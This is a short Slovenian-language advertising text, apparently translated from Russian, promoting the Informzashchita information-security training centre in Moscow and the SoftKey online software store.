  • Center za usposabljanje "Informzashchita" http://www.itsecurity.ru - vodilni specializirani center na področju usposabljanja varnost informacij(Licenca Moskovskega odbora za izobraževanje št. 015470, državna akreditacija št. 004251). Edini pooblaščeni izobraževalni center za internetne varnostne sisteme in Clearswift v Rusiji in državah CIS. Pooblaščeni izobraževalni center Microsoft (Security specialization). Programi usposabljanja so usklajeni z Državno tehnično komisijo Rusije, FSB (FAPSI). Potrdila o usposabljanju in državni dokumenti o izpopolnjevanju.

    SoftKey je edinstvena storitev za kupce, razvijalce, trgovce in pridružene partnerje. Poleg tega je to ena najboljših spletnih trgovin s programsko opremo v Rusiji, Ukrajini, Kazahstanu, ki strankam ponuja široko paleto izdelkov, številne načine plačila, hitro (pogosto takojšnjo) obdelavo naročil, sledenje postopka naročila v osebnem delu, različne popusti v trgovini in proizvajalci BY.